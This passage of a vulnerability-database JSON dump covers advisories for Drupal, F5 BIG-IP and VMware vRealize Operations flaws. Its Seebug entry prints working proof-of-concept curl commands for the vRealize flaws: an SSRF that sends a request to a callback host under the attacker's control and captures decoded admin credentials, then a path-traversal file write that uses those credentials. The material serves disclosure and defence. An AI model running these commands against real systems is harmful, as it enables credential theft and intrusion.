"cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-13936", "CVE-2020-13956", "CVE-2020-13959", "CVE-2020-28458", "CVE-2021-21315"], "modified": "2021-04-24T06:55:55", "id": "098A0B0BBDA18721083717F103FE7FB2B2BBE2394E33149D968FE7B59A7B2AD4", "href": "https://www.ibm.com/support/pages/node/6445703", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}], "redhatcve": [{"lastseen": "2022-05-21T01:08:49", "description": "Drupal core does not properly sanitize certain filenames on uploaded files, which can lead to files being interpreted as the incorrect extension and served as the wrong MIME type or executed as PHP for certain hosting configurations. This issue affects: Drupal Drupal Core 9.0 versions prior to 9.0.8, 8.9 versions prior to 8.9.9, 8.8 versions prior to 8.8.11, and 7 versions prior to 7.74.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-05-20T23:37:25", "type": "redhatcve", "title": "CVE-2020-13671", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-13671"], "modified": "2022-05-20T23:37:25", "id": "RH:CVE-2020-13671", "href": "https://access.redhat.com/security/cve/cve-2020-13671", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}], "debiancve": [{"lastseen": "2021-12-14T17:47:52", "description": "Drupal core does not properly sanitize certain filenames on uploaded files, which can lead to files being interpreted as the incorrect extension and served as the wrong MIME type or executed as PHP for certain hosting configurations. This issue affects: Drupal Drupal Core 9.0 versions prior to 9.0.8, 8.9 versions prior to 8.9.9, 8.8 versions prior to 8.8.11, and 7 versions prior to 7.74.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-11-20T16:15:00", "type": "debiancve", "title": "CVE-2020-13671", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-13671"], "modified": "2020-11-20T16:15:00", "id": "DEBIANCVE:CVE-2020-13671", "href": "https://security-tracker.debian.org/tracker/CVE-2020-13671", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}], "drupal": [{"lastseen": "2023-06-03T13:59:55", "description": "Update November 18: Documented longer list of dangerous file extensions Drupal core does not properly sanitize certain filenames on uploaded files, which can lead to files being interpreted as the incorrect extension and served as the wrong MIME type or executed as PHP for certain hosting configurations.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-11-18T00:00:00", "type": "drupal", "title": "Drupal core - Critical - Remote code execution - SA-CORE-2020-012\n", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-13671"], "modified": "2020-11-18T00:00:00", "id": "DRUPAL-SA-CORE-2020-012", "href": "https://www.drupal.org/sa-core-2020-012", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}], "ubuntucve": [{"lastseen": "2023-06-05T13:35:16", "description": "Drupal core does not properly sanitize certain filenames on uploaded files,\nwhich can lead to files being interpreted as the incorrect extension and\nserved as the wrong MIME type or executed as PHP for certain hosting\nconfigurations. This issue affects: Drupal Drupal Core 9.0 versions prior\nto 9.0.8, 8.9 versions prior to 8.9.9, 8.8 versions prior to 8.8.11, and 7\nversions prior to 7.74.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-11-20T00:00:00", "type": "ubuntucve", "title": "CVE-2020-13671", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-13671"], "modified": "2020-11-20T00:00:00", "id": "UB:CVE-2020-13671", "href": "https://ubuntu.com/security/CVE-2020-13671", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}], "alpinelinux": [{"lastseen": "2023-06-06T13:03:47", "description": "Drupal core does not properly sanitize certain filenames on uploaded files, which can lead to files being interpreted as the incorrect extension and served as the wrong MIME type or executed as PHP for certain hosting configurations. This issue affects: Drupal Drupal Core 9.0 versions prior to 9.0.8, 8.9 versions prior to 8.9.9, 8.8 versions prior to 8.8.11, and 7 versions prior to 7.74.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2023-06-06T13:03:41", "type": "alpinelinux", "title": "CVE-2020-13671", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-13671"], "modified": "2023-06-06T13:03:41", "id": "ALPINE:CVE-2020-13671", "href": "https://security.alpinelinux.org/vuln/CVE-2020-13671", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}], "f5": [{"lastseen": "2023-02-08T16:55:31", "description": "Undisclosed requests to a virtual server may be incorrectly handled by Traffic Management Microkernel (TMM) URI normalization, which may trigger a buffer overflow, resulting in a DoS attack. In certain situations, it theoretically may allow bypass of URL based access control or remote code execution (RCE). ([CVE-2021-22991](<https://vulners.com/cve/CVE-2021-22991>))\n\n**Note**: This vulnerability is mostly exposed on the data plane via virtual server with the vulnerable configuration; however, it can also be exposed on the control plane via URL Categorization lookup command invoked by an authenticated user with TMOS Shell (**tmsh**) access. Exploitation can lead to complete system compromise.\n\nImpact\n\nThis vulnerability affects systems with one or more of the following configurations.\n\nAffected configurations\n\nBIG-IP APM\n\nThis vulnerability affects a virtual server associated with a BIG-IP APM profile. All BIG-IP APM use cases are vulnerable.\n\nBIG-IP ASM\n\nThis vulnerability affects only BIG-IP ASM Risk Engine use cases. BIG-IP ASM Risk Engine is currently available only to Early Access customers and requires a special license.\n\nBIG-IP PEM\n\nThis vulnerability affects BIG-IP PEM systems that use the following:\n\n * URL filtering with Websense database license activated\n * One or more virtual servers that perform URL categorization and use one of the following: \n * An iRule\n * A local traffic policy\n * A BIG-IP PEM policy\n\nSecure Web Gateway\n\nThis vulnerability affects all F5 Secure Web Gateway use cases. URL categorization is fundamental to the operation of the Secure Web Gateway. The Secure Web Gateway requires a separate subscription.\n\nSSL Orchestrator\n\nThis vulnerability affects all systems that use the SSL Orchestrator Categorization macro.\n\nBIG-IP (all modules)\n\nThis vulnerability affects all BIG-IP system modules that use one or more of the following configurations:\n\n * URL filtering with Websense database license activated\n * A virtual server associated with an HTTP profile and a local traffic policy with a rule condition that has the following options enabled: **HTTP URI** or **HTTP Referer** and **Use normalized URI**\n\n**Note**: The **Use normalized URI** option is disabled by default.\n\nFor more information about HTTP profiles and local traffic policy rules, refer to [K40243113: Overview of the HTTP profile](<https://support.f5.com/csp/article/K40243113>) and [K04597703: Overview of the Local Traffic Policies feature (12.1.0 and later)](<https://support.f5.com/csp/article/K04597703>) respectively.\n\nFor example, in the following configuration, the local traffic policy is vulnerable:\n\nltm policy /Common/K56715231 { \n requires { http http-connect } \n rules { \n VULN_RULE01 { \n conditions { \n 0 { \n _http-uri_ \n proxy-connect \n _normalized_ \n values { VULN_URI_STRING } \n } \n } \n } \n VULN_RULE02 { \n conditions { \n 0 { \n _http-referer_ \n proxy-connect \n _normalized_ \n values { VULN_REF_STRING } \n } \n } \n ordinal 1 \n } \n } \n strategy /Common/first-match \n}\n\n * A virtual server associated with an HTTP profile and an iRule that uses any of the following commands with the **-normalized** switch: \n * HTTP::uri\n * HTTP::query\n * HTTP::path\n\nFor example, the following iRule is vulnerable:\n\nwhen HTTP_REQUEST { \n if { ([HTTP::uri -normalized] starts_with "/vulnerable")} { \n log local0.error "K56715231 URI example" \n } elseif { ([HTTP::query -normalized] starts_with "/vulnerable")} { \n log local0.error "K56715231 Query example" \n } elseif { ([HTTP::path -normalized] starts_with "/vulnerable")} { \n log local0.error "K56715231 Path example" \n } \n } \n\nIdentify whether your system has URL filtering with Websense database license activated\n\nYou can identify whether your BIG-IP system has URL filtering with Websense database license activated by checking the **/var/log/tmm** log file during restart. When you have this feature, you see a log entry similar to the following:\n\ntmm:<13> Apr 8 02:34:05 bigip.local notice URLCAT_LIB: urlcat_websense_license_callback/984: WEBSENSE DB is licensed\n\nThis log entry only displays when you set the BIG-IP system database variable **tmm.lib.urlcat.log.level** to **Debug**.\n\n**Note**: If you believe your system is compromised, refer to [K11438344: Considerations and guidance when you suspect a security compromise on a BIG-IP system](<https://support.f5.com/csp/article/K11438344>).\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-03-10T14:51:00", "type": "f5", "title": "TMM buffer-overflow vulnerability CVE-2021-22991", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-22991", "CVE-2021-23007"], "modified": "2021-07-08T02:56:00", "id": "F5:K56715231", "href": "https://support.f5.com/csp/article/K56715231", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "seebug": [{"lastseen": "2021-07-24T15:55:32", "description": "# Description\n\nOn March 30, 2021, VMware published a [security advisory](https://www.vmware.com/security/advisories/VMSA-2021-0004.html) for [CVE-2021-21975](https://nvd.nist.gov/vuln/detail/CVE-2021-21975) and [CVE-2021-21983](https://nvd.nist.gov/vuln/detail/CVE-2021-21983), two chainable vulnerabilities in its vRealize Operations Manager product. CVE-2021-21975 is an unauthenticated server-side request forgery (SSRF), while CVE-2021-21983 is an authenticated arbitrary file write. Successfully chaining both vulnerabilities achieves unauthenticated remote code execution (RCE) in vRealize Operations Manager and any product using it as a component.\n\nAt the time of public disclosure, Positive Technologies [tweeted](https://twitter.com/ptswarm/status/1376961747232382976) about CVE-2021-21975 and CVE-2021-21983, which were both discovered by their researcher [Egor Dimitrenko](https://twitter.com/elk0kc).\n\n# Affected products\n\n- vRealize Operations Manager\n - 7.0.0\n - 7.5.0\n - 8.0.0, 8.0.1\n - 8.1.0, 8.1.1\n - 8.2.0\n - 8.3.0\n- VMware Cloud Foundation (vROps)\n - 3.x\n - 4.x\n- vRealize Suite Lifecycle Manager (vROps)\n - 8.x\n\n# Technical analysis\n\nCVE-2021-21975 is the primary focus of this analysis.\n\n## CVE-2021-21975 (SSRF)\n\n`/nodes/thumbprints` (mapped to `/casa/nodes/thumbprints`) is an unauthenticated endpoint.\n\n```\n <sec:http pattern=\"/nodes/thumbprints\" security='none'/>\n```\n\nIt accepts a `POST` request whose body is a JSON array of network address strings.\n\n```\n @RequestMapping(value = {\"/nodes/thumbprints\"}, method = {RequestMethod.POST})\n @ResponseStatus(HttpStatus.OK)\n public ArrayList<ThumbprintResource> getNodesThumbprints(@RequestBody String[] addresses) {\n return this.clusterDefService.getNodesThumbprints(new HashSet(Arrays.asList((Object[])addresses)));\n }\n```\n\nEach address is sent a crafted `GET` request, leading to a partially controlled SSRF.\n\n```\n public ArrayList<ThumbprintResource> getNodesThumbprints(Set<String> addresses) {\n ArrayList<ThumbprintResource> ipToThumbprint = new ArrayList<>();\n if (null == addresses) {\n return ipToThumbprint;\n }\n configureInsecurRestTemplate();\n\n HttpMapFunction f = new HttpMapFunction(addresses.<String>toArray(new String[addresses.size()]), RequestMethod.GET, \"/node/thumbprint\", null, null, this.webappInfo, this.timeoutForGetRequest, this.restTemplate);\n\n\n\n\n\n\n\n\n HttpMapResponse[] responses = f.execute();\n\n for (HttpMapResponse resp : responses) {\n if (resp.getHttpCode() == HttpStatus.OK.value()) {\n String data = resp.getDocument().replace('\"', ' ').trim();\n ipToThumbprint.add(new ThumbprintResource(resp.getSliceAddress(), data));\n } else {\n ipToThumbprint.add(new ThumbprintResource(resp.getSliceAddress(), null));\n }\n }\n\n return ipToThumbprint;\n }\n```\n\n### PoC\n\nThe [provided workaround](https://kb.vmware.com/s/article/83210) provided enough information to develop a PoC.\n\n```\nwvu@kharak:~$ curl -k https://192.168.123.185/casa/nodes/thumbprints -H \"Content-Type: application/json\" -d '[\"192.168.123.1:8443/#\"]'\n```\n\nAppending `#` (presumably [URI fragment syntax](https://en.wikipedia.org/wiki/URI_fragment)) to the SSRF URI allows for full control of the `GET` request path.\n\n```\nwvu@kharak:~$ ncat -lkv --ssl 8443\nNcat: Version 7.91 ( https://nmap.org/ncat )\nNcat: Generating a temporary 2048-bit RSA key. Use --ssl-key and --ssl-cert to use a permanent one.\nNcat: SHA-1 fingerprint: DD68 63E6 C329 1851 F74F 797A F684 7823 207A 55E7\nNcat: Listening on :::8443\nNcat: Listening on 0.0.0.0:8443\nNcat: Connection from 192.168.123.185.\nNcat: Connection from 192.168.123.185:36070.\nGET / HTTP/1.1\nAccept: application/xml, application/json\nContent-Type: application/json\nAccept-Charset: big5, big5-hkscs, cesu-8, euc-jp, euc-kr, gb18030, gb2312, gbk, ibm-thai, ibm00858, ibm01140, ibm01141, ibm01142, ibm01143, ibm01144, ibm01145, ibm01146, ibm01147, ibm01148, ibm01149, ibm037, ibm1026, ibm1047, ibm273, ibm277, ibm278, ibm280, ibm284, ibm285, ibm290, ibm297, ibm420, ibm424, ibm437, ibm500, ibm775, ibm850, ibm852, ibm855, ibm857, ibm860, ibm861, ibm862, ibm863, ibm864, ibm865, ibm866, ibm868, ibm869, ibm870, ibm871, ibm918, iso-2022-cn, iso-2022-jp, iso-2022-jp-2, iso-2022-kr, iso-8859-1, iso-8859-13, iso-8859-15, iso-8859-2, iso-8859-3, iso-8859-4, iso-8859-5, iso-8859-6, iso-8859-7, iso-8859-8, iso-8859-9, jis_x0201, jis_x0212-1990, koi8-r, koi8-u, shift_jis, tis-620, us-ascii, utf-16, utf-16be, utf-16le, utf-32, utf-32be, utf-32le, utf-8, windows-1250, windows-1251, windows-1252, windows-1253, windows-1254, windows-1255, windows-1256, windows-1257, windows-1258, windows-31j, x-big5-hkscs-2001, x-big5-solaris, x-compound_text, x-euc-jp-linux, x-euc-tw, x-eucjp-open, x-ibm1006, x-ibm1025, x-ibm1046, x-ibm1097, x-ibm1098, x-ibm1112, x-ibm1122, x-ibm1123, x-ibm1124, x-ibm1166, x-ibm1364, x-ibm1381, x-ibm1383, x-ibm300, x-ibm33722, x-ibm737, x-ibm833, x-ibm834, x-ibm856, x-ibm874, x-ibm875, x-ibm921, x-ibm922, x-ibm930, x-ibm933, x-ibm935, x-ibm937, x-ibm939, x-ibm942, x-ibm942c, x-ibm943, x-ibm943c, x-ibm948, x-ibm949, x-ibm949c, x-ibm950, x-ibm964, x-ibm970, x-iscii91, x-iso-2022-cn-cns, x-iso-2022-cn-gb, x-iso-8859-11, x-jis0208, x-jisautodetect, x-johab, x-macarabic, x-maccentraleurope, x-maccroatian, x-maccyrillic, x-macdingbat, x-macgreek, x-machebrew, x-maciceland, x-macroman, x-macromania, x-macsymbol, x-macthai, x-macturkish, x-macukraine, x-ms932_0213, x-ms950-hkscs, x-ms950-hkscs-xp, x-mswin-936, x-pck, x-sjis_0213, x-utf-16le-bom, x-utf-32be-bom, x-utf-32le-bom, x-windows-50220, x-windows-50221, x-windows-874, x-windows-949, x-windows-950, x-windows-iso2022jp\nX-VSCM-Request-Id: ak00003Y\nAuthorization: Basic bWFpbnRlbmFuY2VBZG1pbjpSZmRzeEsvNU00TVNrMnNpMTc0S0loRFY=\nCache-Control: no-cache\nPragma: no-cache\nUser-Agent: Java/1.8.0_212\nHost: 192.168.123.1:8443\nConnection: keep-alive\n```\n\nNote the `Authorization: Basic` header, which is present in older vulnerable versions but missing from 8.3.0. The Base64 `bWFpbnRlbmFuY2VBZG1pbjpSZmRzeEsvNU00TVNrMnNpMTc0S0loRFY=` decodes to the credentials `maintenanceAdmin:RfdsxK/5M4MSk2si174KIhDV`.\n\n## CVE-2021-21983 (file write)\n\nCVE-2021-21983 is a path traversal in the `/casa/private/config/slice/ha/certificate` endpoint.\n\n```\n @RequestMapping(value = {\"/private/config/slice/ha/certificate\"}, method = {RequestMethod.POST})\n @ResponseBody\n @ResponseStatus(HttpStatus.OK)\n @Auditable(category = Auditable.Category.CONFIG_SLICE_CERTIFICATE, auditMessage = \"Accepting replicated certificate from Master slice\")\n public void handleCertificateUpload(@RequestParam(\"name\") String name, @RequestParam(\"file\") MultipartFile multiPartFile) {\n try {\n this.certificateService.handleCertificateFile(multiPartFile, name);\n } catch (Exception e) {\n this.log.error(\"Error handling replica certificate upload: {}\", e);\n throw new CasaException(e, \"Failed to upload replica certificate\");\n }\n }\n void handleCertificateFile(MultipartFile multiPartFile, String fileName) {\n+ if (fileName == null || !fileName.equals(\"cakey.pem\")) {\n+ throw new CasaException(\"Wrong cert file name is provided\");\n+ }\n File certFile = new File(this.certDirPath, fileName);\n\n try {\n multiPartFile.transferTo(certFile);\n\n certFile.setExecutable(false, false);\n } catch (Exception e) {\n throw new CasaException(\"Error writing Certificate file: \" + certFile.getAbsolutePath(), e);\n }\n }\n```\n\n### PoC\n\n```\nwvu@kharak:~$ curl -kH \"Authorization: Basic bWFpbnRlbmFuY2VBZG1pbjpSZmRzeEsvNU00TVNrMnNpMTc0S0loRFY=\" https://192.168.123.185/casa/private/config/slice/ha/certificate -F name=../../../../../tmp/vulnerable -F \"file=@-; filename=vulnerable\" <<<vulnerable\nwvu@kharak:~$\nroot@vRealizeClusterNode [ /tmp ]# ls -l vulnerable\n-rw-r--r-- 1 admin admin 11 Apr 5 22:18 vulnerable\nroot@vRealizeClusterNode [ /tmp ]# cat vulnerable\nvulnerable\nroot@vRealizeClusterNode [ /tmp ]#\n```\n\n## IOCs\n\nNumerous log files can be found in `/usr/lib/vmware-casa/casa-webapp/logs`. The file `/usr/lib/vmware-casa/casa-webapp/logs/casa.log` is of particular interest for tracking suspicious requests.\n\n```\n2021-04-03 07:58:33,113 [ak0000BL] [ajp-nio-127.0.0.1-8011-exec-10] INFO casa.support.RequestIdIncomingInterceptor:60 - Request POST /casa/nodes/thumbprints from 192.168.123.1: New request id ak0000BL\n2021-04-03 07:58:33,113 [ak0000BL] [ajp-nio-127.0.0.1-8011-exec-10] INFO casa.support.HttpMapFunction:325 - execute, hosts=[192.168.123.1:8443/#], op=GET, relativeUrl=/node/thumbprint, doc={}\n2021-04-03 07:58:33,116 [ak0000BL] [pool-36-thread-1] INFO casa.support.HttpTask:128 - Making HTTP call to url=https://192.168.123.1:8443/#/casa/node/thumbprint\n2021-04-03 07:58:33,117 [ak0000BL] [pool-36-thread-1] DEBUG casa.support.CasaRestTemplate:147 - HTTP GET https://192.168.123.1:8443/#/casa/node/thumbprint\n2021-04-03 07:58:33,117 [ak0000BL] [pool-36-thread-1] DEBUG casa.support.CasaRestTemplate:147 - Accept=[text/plain, application/json, application/*+json, */*]\n2021-04-03 07:58:33,117 [ak0000BL] [pool-36-thread-1] DEBUG casa.support.CasaRestTemplate:147 - Writing [{}] as \"application/json\"\n2021-04-03 07:58:33,118 [ak0000BL] [pool-36-thread-1] INFO casa.support.MaintenanceUserUtils:33 - Maintenance User credentials initialized\n2021-04-03 07:58:43,114 [ak0000BL] [ajp-nio-127.0.0.1-8011-exec-10] WARN casa.support.HttpMapFunction:414 - Error retrieving HttpTask future: java.util.concurrent.CancellationException\n2021-04-03 07:58:43,116 [ak0000BL] [ajp-nio-127.0.0.1-8011-exec-10] INFO casa.support.RequestIdIncomingInterceptor:93 - Request POST /casa/nodes/thumbprints: Done\n2021-04-05 22:18:22,066 [ ] [ajp-nio-127.0.0.1-8011-exec-10] INFO casa.security.UsernamePasswordAuthenticator:104 - Authenticated maintenance user 'maintenanceAdmin'\n2021-04-05 22:18:22,066 [ak0002Q9] [ajp-nio-127.0.0.1-8011-exec-10] INFO casa.support.RequestIdIncomingInterceptor:60 - Request POST /casa/private/config/slice/ha/certificate from 192.168.123.1: New request id ak0002Q9\n2021-04-05 22:18:22,067 [ak0002Q9] [ajp-nio-127.0.0.1-8011-exec-10] INFO casa.support.RequestIdIncomingInterceptor:93 - Request POST /casa/private/config/slice/ha/certificate: Done\n```\n\nNote that the SSRF most likely requires a callback address in order to extract the `Authorization: Basic` header and any credentials it contains.\n\n# Guidance\n\nPlease see the **Response Matrix** in the [advisory](https://www.vmware.com/security/advisories/VMSA-2021-0004.html) for fixed versions and workarounds.\n\n# References\n\n- https://www.vmware.com/security/advisories/VMSA-2021-0004.html\n- https://twitter.com/ptswarm/status/1376961747232382976", "cvss3": {}, "published": "2021-03-31T00:00:00", "type": "seebug", "title": "VMware vRealize Operations Manager SSRF\u548c\u6587\u4ef6\u8bfb\u53d6\u6f0f\u6d1e\uff08CVE-2021-21975 CVE-2021-21983\uff09", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2021-21975", "CVE-2021-21983"], "modified": "2021-03-31T00:00:00", "id": "SSV:99173", "href": "https://www.seebug.org/vuldb/ssvid-99173", "sourceData": "", "sourceHref": "", "cvss": {"score": 8.5, "vector": "AV:N/AC:L/Au:S/C:N/I:C/A:C"}}, {"lastseen": "2021-07-24T16:14:43", "description": "", "cvss3": {}, "published": "2021-03-12T00:00:00", "type": "seebug", "title": "F5 Networks \u591a\u4e2a\u6f0f\u6d1e\uff08CVE-2021-22986\u3001CVE-2021-22987\u3001CVE-2021-22988\u3001CVE-2021-22989\u3001CVE-2021-22990\u3001CVE-2021-22991\u3001CVE-2021-22992\uff09", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2021-22986", "CVE-2021-22987", "CVE-2021-22988", "CVE-2021-22989", "CVE-2021-22990", "CVE-2021-22991", "CVE-2021-22992"], "modified": "2021-03-12T00:00:00", "id": "SSV:99156", "href": "https://www.seebug.org/vuldb/ssvid-99156", "sourceData": "", "sourceHref": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "vmware": [{"lastseen": "2021-09-03T02:07:16", "description": "##### **1\\. Impacted Products**\n\n * VMware vRealize Operations \n\n * VMware Cloud Foundation \n\n * vRealize Suite Lifecycle Manager \n\n\n##### **2\\. Introduction**\n\nMultiple vulnerabilities in VMware vRealize Operations were privately reported to VMware. Patches and Workarounds are available to address these vulnerabilities in impacted VMware products. \n\n\n##### **3a. Server Side Request Forgery in vRealize Operations Manager API (CVE-2021-21975)**\n\n**Description**\n\nThe vRealize Operations Manager API contains a Server Side Request Forgery. VMware has evaluated this issue to be of 'Important' severity with a maximum CVSSv3 base score of [8.6](<https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N>). \n\n\n**Known Attack Vectors**\n\nA malicious actor with network access to the vRealize Operations Manager API can perform a Server Side Request Forgery attack to steal administrative credentials. \n\n\n**Resolution**\n\nTo remediate CVE-2021-21975 apply the updates listed in the 'Fixed Version' column of the 'Response Matrix' below to impacted deployments. \n\n\n**Workarounds**\n\nWorkarounds for CVE-2021-21975 have been listed in the 'Workarounds' column of the 'Response Matrix' below. \n\n\n**Additional Documentation**\n\nA FAQ was created which is listed in the 'Additional Documentation' column of the 'Response Matrix' below.\n\n**Acknowledgements**\n\nVMware would like to thank Egor Dimitrenko of Positive Technologies for reporting this vulnerability to us. \n\n\n##### **3b. Arbitrary file write vulnerability in vRealize Operations Manager API (CVE-2021-21983)**\n\n**Description**\n\nThe vRealize Operations Manager API contains an arbitrary file write vulnerability. VMware has evaluated this issue to be of 'Important' severity with a maximum CVSSv3 base score of [7.2](<https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H>). \n\n\n**Known Attack Vectors**\n\nAn authenticated malicious actor with network access to the vRealize Operations Manager API can write files to arbitrary locations on the underlying photon operating system. \n\n\n**Resolution**\n\nTo remediate CVE-2021-21983 apply the updates listed in the 'Fixed Version' column of the 'Response Matrix' below to affected deployments. \n\n\n**Workarounds**\n\nWorkarounds for CVE-2021-21983 have been listed in the 'Workarounds' column of the 'Response Matrix' below. \n\n\n**Additional Documentation**\n\nA FAQ was created which is listed in the 'Additional Documentation' column of the 'Response Matrix' below. \n\n\n**Acknowledgements**\n\nVMware would like to thank Egor Dimitrenko of Positive Technologies for reporting this vulnerability to us. \n\n\n**Notes**\n\n[1] The hotfixes previously mentioned in this advisory were found to only have partially resolved CVE-2021-21975 leaving a residual risk of moderate severity (CVSS = 4.3). Hotfixes created to resolve the vulnerabilities documented in 